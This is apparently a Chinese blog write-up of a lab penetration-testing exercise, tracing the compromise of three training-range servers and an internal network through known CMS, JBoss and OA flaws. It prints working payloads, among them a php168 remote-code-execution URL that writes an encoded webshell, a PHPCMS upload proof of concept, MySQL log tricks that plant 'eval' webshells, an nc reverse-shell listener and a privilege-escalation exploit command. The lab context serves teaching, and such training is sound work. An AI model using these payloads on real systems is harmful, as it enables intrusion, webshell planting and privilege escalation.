内容字号:默认大号超大号

段落设置:段首缩进取消段首缩进

字体设置:切换到微软雅黑切换到宋体

渗透测试到内网综合练习

2018-07-11 18:06 出处:清屏网 人气: 评论(0

难度系数: ☆☆☆

——————————

目标IP:192.168.15.53 

192.168.15.54

192.168.15.57

已知信息:上述IP其中一台服务器连着内网

练习任务:拿下目标IP服务器并进行内网渗透

本次老师只发放了三个外网ip地址,而不是像上次一样直接把导图发给我们,这意味着本次内网ip需要手动去寻找。

接下来,让我们真正开始进行练习吧~

目标一:192.168.15.54

使用工具扫描端口:

端口分别为8081、999、3389 、3306,端口8081即网站web服务,端口999为phpmyadmin后台地址。

访问 8081 端口:

图标告诉我们这是一个php168,既然放出来这个cms,这个cms 必然是有漏洞的。

我们可以 搜集该程序在网上已知的漏洞信息。

漏洞链接:

https://www.secpulse.com/archives/21707.html

这篇文章的漏洞点在login.php文件中,但是目标网站并没有该文件,所以测试失败了。

我们试试其他的已知漏洞。

第二篇漏洞文章介绍:

https://www.secpulse.com/archives/6663.html

注册会员访问这个漏洞地址:

/member/post.php?only=1&showHtml_Type[bencandy][1]={${phpinfo()}}&aid=1&job= endHTML

看到漏洞是存在的,我们把执行的代码换成生成一句话木马的代码:

http://192.168.15.54:8081/member/post.php?only=1&aid=1&job=endHTML&showHtml_Type[bencandy][1]={${fwrite(fopen(base64_decode(%27eC5waHAg%27),%27w%27),base64_decode(%27PD9AZXZhbCgkX1BPU1RbJ3Bhc3MnXSk7Pz4g%27))%20and%20print(%27ok%27)}}

执行成功会在当前目录生成一个x.php 一句话文件。

访问x.php文件是存在的,我们 打开菜刀连接。

查看是否执行cmd。

竟然有

325个补丁, 意味着exp成功率很低了。只能调整思路,前面得到的信息phpmyadmin还没有拿到密码,现在可以从数据库配置文件中找到密码尝试登陆。

成功登录,

有了mysql ,那就尝试udf提权。

成功执行。

然而事情并没有那么简单,在执行添加用户的时候 net 无法使用,只能查找利用无net添加账户的办法。

添加账户成功,查看 ip信息,发现没有其他ip信息。这台服务器没有通内网,那就进行下一个目标。

目标二:192.168.15.57

查看目标ip信息。

开启了999、3306、8088等端口,其中 999 是phpmyadmin端口、3306 是mysql服务端口,8088端口上存在http服务,可以先从8088端口开始测试。

发现是一个招聘网站,测试一些常见参数,结果存在异常。

貌似存在一个注入,使用sqlmap进行测试。

成功注入。

注入出账户,却无法注入出密码。可暂且把root密码注入出来。

成功注入root密码,尝试登录mysql服务或者phpmyadmin。

这时候有了数据库就看能不能找到路径了。

根据以往实验知道护卫神套件的phpmyadmin 是放在phpweb/web当前目录下的 ,那么就利用更改日志路径拿shell。(小提示:该目录默认是没有权限的,因靶场负责人疏忽而开启)

查看服务器信息:发现只打了三个补丁,可以使用常见的提权工具进行提权。

查看ip信息发现没有敏感ip, 那么进入存在内网IP的只能是最后一台服务器了。

目标三:192.168.15.53

信息收集方式与前面相同,这里就不赘述了。直接 访问该目标:

是一个通达oa系统,下面是相关漏洞链接:

https://www.secpulse.com/archives/24591.html

这个漏洞需要进入后台操作,但是我们没有账户,尝试搜索一下注入的漏洞,发现都是需要登陆。暴力破解和手动猜解密码都不可行。

结果无意中输入了admin,密码填都不用填就登陆成功了。

还是很幸运的~

上方漏洞介绍表明是利用上传图片马进行文件包含,找到一处上传点。

这里不是直接引用图片地址,而是调用参数获取,意味着真实路径找不到了。只能再仔细分析url:

http://192.168.15.53:8088/inc/attach_old.php?ATTACHMENT_ID=photo&ATTACHMENT_NAME=1.jpg&DIRECT_VIEW=1

通过路径看url,猜想会不会是 photo/attachment/1.jpg。

我们试试。

显然不是,我们再换一下位置

attachment/photo/1.jpg

访问出现403,证明这个文件存在。说明我们把路径猜对了(心里开心下)

那么我们可以直接进行文件包含。

文件包含成功, 连接菜刀。

显示未登录,直接在菜刀里登陆。

菜刀连接还是出现报错。

确认菜刀问题,更换另外的版本就可以了。

成功连接。

存在四个补丁,这里利用普通的提权工具便能提权成功了。

下面进行内网渗透的过程。

内网渗透

发现有10段ip,使用 ew工具转发,通过对之前的端口收集情况,尝试扫描999、8088、8081、8008等端口。

发现ip  10.12.1.2,10.12.1.3 ,10.12.15,访问10.12.1.2 。

发现是个jboss,在网上找了许多exp利用工具,最后发现一款工具可以使用,

工具下载地址:

http://scan.javasec.cn/java/jboss_CVE-2017-12149.zip

本地nc监听: nc -lvvp 3666 

利用工具反弹shell。

成功利用。

找到一个root文件 ,里面的内容为: aHV3ZWlza ,暂且先记着。

接下来访问10.12.1.3。

是一个phpcms系统,刚好上个礼拜试验过:

PHPcms9.6.0 最新版任意文件上传漏洞(直接getshell)

poc如下:

siteid=1&modelid=11&username=test123456&password=test676676&email=test56566@qq.com&info[content]=<img src=http://10.12.1.2/1.txt?.php#.jpg>&dosubmit=1&protocol=

其中:http://10.12.1.2/1.txt

文件需要自己创建且目标机器能访问的资源,内容为一句话木马。

shell地址:

http://10.12.1.3/uploadfile/2018/0628/20180628113055384.php

打开菜刀连接。

虚拟终端查看权限发现是system ,可以添加用户直接登陆远程桌面。

登陆之后和目标机器2一样,找找线索...

找到一个文件里面存在奇怪的密码 :GVuLmNvbQ== 

到这里整理一下收集到的线索:

10.12.12  ==> aHV3ZWlza

10.12.1.3 ==> GVuLmNvbQ== 

看着是不是很熟悉,base64加密,先组合解密一下。

得到 huweishen.com  , 难道还是mysql的密码?

根据上次实验,这个应该就是10.12.1.5 的mysql密码

内网目标:10.12.1.5

打开 10.12.1.5 ,是一个静态页面,在开始内网扫描的时候发现开了几个端口。

习惯性的目录扫描一下:

结果发现10.12.1.5:999 和10.12.1.5/phpmyadmin 是同一个phpmyadmin登陆页面,

试了弱口令和爆破,都没有成功。(字典太弱了)

这个时候想起之前解密出来的一个密码:huweishen.com,尝试了一下果然登陆成功。

拿到mysql权限,下一步肯定日志写webshell,udf提权。 在这之前先看看mysql 的安装路径。

利用select @@basedir; 查询到路径为:

C:/Huweishen.com/PHPWEB/MySQL Server 5.5,

是护卫神的环境, 接下来就是拿shell了, 但是遇到了一个问题就是没有拿到网站的路径。在网上看了一下护卫神的网站目录(默认是d:\wwwroot\xxx),但是试着写入,以失败告终。

这个地方卡住了, 就在准备放弃的时候,想到一个办法!

就是现在能访问phpmyadmin ,为何不把shell文件放到phpmyadmin目录呢,行动起来。

该怎么找phpmyadmin的目录呢?

下载一个护卫神本地安装一下,可以看到 phpmyadmin 默认的路径是这个:

C:\Huweishen.com\PHPWEB\phpmyadmin\web 

找到路径就可以写入了, 还是利用日志写入的方式,在写shell之前先写入一个测试文件。

可以访问:

1、set global general_log='on'

2、set global general_log_file='C:\\Huweishen.com\\PHPWEB\\phpmyadmin\\web\\shell.php'

3、select "<?php eval($_POST[0])?>"

按照上面的步骤操作, 成功拿到shell(地址:http://10.12.1.5:999/shell.php)!

拿到shell 发现 cmd 不能执行命令。

根据经验,我们换个别的木马试一下, asp,aspx ......发现还支持aspx的,于是就使用了aspx的木马。

cmd还是不能运行....

在我翻看资源文件的时候发现里面有ftp ,这让我想到  serv-u....

于是我就找了软件安装目录,果然有...

找到配置文件,看到里面加密的密码....

解出密码 123

密码不对,无法连接,只能继续寻找, 一定有正确的配置文件...

存在一个配置文件的副本,打开发现 password的加密值是不一样的,先解密看看。

解密得到 gongxifacai  。

命令执行成功,,,但是没有回显,把命令执行的结果储存到一个文本中就可以了!

whoami 的结果是一个低权限的账户,但只要能执行cmd命令就好办!

systeminfo查看系统信息发现补丁就打了两个,这下应该可以用exp了。

利用提权辅助找到可以用的exp...来看看效果,, 

执行:

cmd.exe /c C:\Huweishen.com\PHPWEB\phpmyadmin\web\ms15-051x64.exe "whoami" > C:\Huweishen.com\PHPWEB\phpmyadmin\web\2.txt

拿到system权限!剩下的就简单啦~

到了这里此次渗透测试练习终于完成了。

总结

  1. 根据已知的程序或中间件名称来在网上寻找公开的利用漏洞信息。

  2. 在本机模拟目标机器的环境往往会获得一些有用的信息,了解目标才更容易成功的渗透进去。

分享给小伙伴们:
本文标签: 渗透测试

相关文章

发表评论愿您的每句评论,都能给大家的生活添色彩,带来共鸣,带来思索,带来快乐。

CopyRight © 2015-2016 QingPingShan.com , All Rights Reserved.

清屏网 版权所有 豫ICP备15026204号